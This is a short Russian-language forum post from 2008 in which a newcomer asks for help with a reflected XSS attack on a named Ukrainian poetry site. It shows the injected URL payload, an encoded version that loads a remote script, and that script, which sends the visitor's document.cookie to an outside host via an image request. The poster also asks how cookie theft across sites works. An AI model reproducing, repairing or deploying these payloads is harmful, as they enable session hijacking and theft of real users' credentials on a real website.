05.02.2008, 21:13
|
|
Новичок
Регистрация: 04.02.2008
Сообщений: 4
С нами:
9614495
Репутация:
4
|
|
Пассивный XSS
Сообщение от it's my
Код:
http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E'%22%3E%3Cscript%3Ealert(document.coockie)%3C/script%3E
--
не подскажите почему не работает мой скрипт? мой скрипт -
Сообщение от it's my
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'%22%3E%3C/script%3E%27%22%3E%3Cscript%20%73%72%63%3D%68%74%74%70%3A//%78%78%73%2D%78%78%73%2E%6E%6D%2E%72%75%2F%6A%73%2E%6A%73%3E%20%3C/script%3E%0D%0A";
по сути это
Сообщение от it's my
Код:
document.location.href="http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script src=http://xxs-xxs.nm.ru/js.js> </script>";
а в оригенале
Сообщение от it's my
Код:
http://www.poetryclub.com.ua/author.php?id=3873'"></script>'"><script>alert(document.coockie)</script>>";
xxs-xxs.nm.ru/js.js - там
Сообщение от it's my
Код:
<script> img = new Image(); img.src="http://s.netsec.ru/Onex.gif?"+document.cookie;</script>
Помогите плиз разобраться =(
И еще вопрос.. если тырю куки с zzz.ru то и дыра должна быть в zzz.ru ? Спасибо |
|
|